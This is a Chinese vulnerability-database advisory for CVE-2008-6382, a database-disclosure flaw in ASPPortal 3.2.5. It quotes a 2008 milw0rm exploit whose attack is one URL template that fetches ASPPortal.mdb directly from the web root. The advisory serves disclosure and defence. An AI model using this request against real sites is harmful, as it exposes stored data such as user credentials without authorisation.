ASP Portal 'ASPPortal.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116899 漏洞类型 权限许可和访问控制
发布时间 2008-12-01 更新时间 2009-03-02
CVE编号 CVE-2008-6382 CNNVD-ID CNNVD-200903-036
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7316
https://www.securityfocus.com/bid/84544
https://cxsecurity.com/issue/WLB-2009030120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-036
|漏洞详情
ASPPortal是基于ASP的内容管理系统(CMS)。ASPPortal3.2.5版本在网站根目录下储存敏感信息,但没有赋予足够的访问控制,这会允许远程攻击者可以借助对ASPPortal.mdb提交一个直接的请求,获得敏感信息。
|漏洞EXP
===================================================================
  ASPPortal Free Version Remote Database Disclosure Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'
	

AUTHOR : CWH Underground
DATE   : 1 December 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : ASPPortal
 VERSION     : Free Version
 VENDOR	     : www.aspportal.net
 Download    : www.aspportal.net/download.aspx
#####################################################

http://[Target]/[aspportal_path]/Data/ASPPortal.mdb

# milw0rm.com [2008-12-01]
|受影响的产品
Aspportal Aspportal 3.2.5
|参考资料

来源:MILW0RM
名称:7316
链接:http://www.milw0rm.com/exploits/7316
来源:SECUNIA
名称:32889
链接:http://secunia.com/advisories/32889
来源:OSVDB
名称:50372
链接:http://osvdb.org/50372